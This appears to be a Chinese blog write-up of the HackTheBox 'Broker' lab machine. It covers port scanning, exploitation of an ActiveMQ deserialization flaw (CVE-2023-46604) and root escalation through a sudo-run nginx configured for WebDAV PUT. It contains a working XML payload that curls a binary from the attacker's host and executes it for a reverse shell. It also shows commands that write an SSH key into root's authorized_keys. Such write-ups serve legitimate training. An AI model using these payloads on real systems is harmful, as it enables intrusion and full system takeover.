[Meachines] [Easy] Broker Apache MQ RCE+Nginx ngx_http_dav_module权限提升

Мартин.2025-02-12 6:05

Information Gathering

IP Address Opening Ports
10.10.11.243 TCP:22,80,1883,5672,8161,38507,61613,61614,61616

$ ip='10.10.11.243'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

bash 复制代码 
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_  256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp    open  http       nginx 1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-server-header: nginx/1.18.0 (Ubuntu)
1883/tcp  open  mqtt
| mqtt-subscribe: 
|   Topics and their most recent payloads: 
|_    ActiveMQ/Advisory/Consumer/Topic/#: 
5672/tcp  open  amqp?
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     AMQP
|     AMQP
|     amqp:decode-error
|_    7Connection from client using unsupported AMQP attempted
8161/tcp  open  http       Jetty 9.4.39.v20210325
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-title: Error 401 Unauthorized
|_http-server-header: Jetty(9.4.39.v20210325)
38507/tcp open  tcpwrapped
61613/tcp open  stomp      Apache ActiveMQ
| fingerprint-strings: 
|   HELP4STOMP: 
|     ERROR
|     content-type:text/plain
|     message:Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
|     org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
|     org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
|     org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
|     org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_    java.lang.Thread.run(Thread.java:750)
61614/tcp open  http       Jetty 9.4.39.v20210325
|_http-title: Site doesn't have a title.
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Jetty(9.4.39.v20210325)
61616/tcp open  apachemq   ActiveMQ OpenWire transport
| fingerprint-strings: 
|   NULL: 
|     ActiveMQ
|     TcpNoDelayEnabled
|     SizePrefixDisabled
|     CacheSize
|     ProviderName 
|     ActiveMQ
|     StackTraceEnabled
|     PlatformDetails 
|     Java
|     CacheEnabled
|     TightEncodingEnabled
|     MaxFrameSize
|     MaxInactivityDuration
|     MaxInactivityDurationInitalDelay
|     ProviderVersion 
|_    5.15.15

Apache MQ RCE

$ wget https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ/archive/refs/heads/main.zip

复制代码 
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="
 http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
        <list>
            <value>sh</value>
            <value>-c</value>
            <!-- The command below downloads the file and saves it as test.elf -->
	    <value>curl -s -o reverse http://10.10.16.28/reverse; chmod +x ./reverse; ./reverse</value>
        </list>
        </constructor-arg>
    </bean>
</beans>

$ go run main.go -i 10.10.11.243 -p 61616 -u http://10.10.16.28:9999/poc-linux.xml

User.txt

a178c399b0c91839399aa5b98c0c117c

Privilege Escalation: Nginx ngx_http_dav_module

sh 复制代码 
$ cat << EOF> /tmp/shell.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;

events {
    worker_connections 768;
}

http {
    server {
        listen 10031;
        root /;
        autoindex on;
        dav_methods PUT;
    }
}
EOF

$ sudo nginx -c /tmp/shell.conf

$ ssh-keygen

$ curl -X PUT http://10.10.11.243:10031/root/.ssh/authorized_keys -d @/home/maptnh/.ssh/id_ed25519.pub

$ ssh [email protected] -i /home/maptnh/.ssh/id_ed25519

Root.txt

26eecd6da62a87d2098e474929f93140

相关推荐
霍志杰1 小时前
网址为 http://xxx:xxxx/的网页可能暂时无法连接,或者它已永久性地移动到了新网址
nginx
hnlucky3 小时前
《基于 Kubernetes 的 WordPress 高可用部署实践:从 MariaDB 到 Nginx 反向代理》
运维·数据库·nginx·云原生·容器·kubernetes·mariadb
___波子 Pro Max.4 小时前
http断点续传
网络·http
Johny_Zhao4 小时前
Ubuntu安装部署Zabbix网络监控平台和设备配置添加
linux·网络·mysql·网络安全·信息安全·云计算·apache·zabbix·shell·yum源·系统运维·itsm
铁锚4 小时前
一个WordPress连续登录失败的问题排查
java·linux·服务器·nginx·tomcat
_板栗_4 小时前
HTTP 错误状态码以及常用解决方案
网络·网络协议·http
嘵奇5 小时前
Spring Boot中HTTP连接池的配置与优化实践
spring boot·后端·http
熙曦Sakura5 小时前
【Linux网络】 HTTP cookie与session
linux·网络·http
搬砖的工人5 小时前
Docker环境下的Apache NiFi安装实践踩坑记录
docker·容器·apache
热门推荐
01YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】02从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑03KGG转MP3工具|非KGM文件|解密音频04DeepSeek各版本说明与优缺点分析05【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!06Coze扣子平台完整体验和实践(附国内和国际版对比)07YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU08组基轨迹建模 GBTM的介绍与实现(Stata 或 R)09苍穹外卖面试总结10VMware虚拟机安装Win7专业版保姆级教程(附镜像包)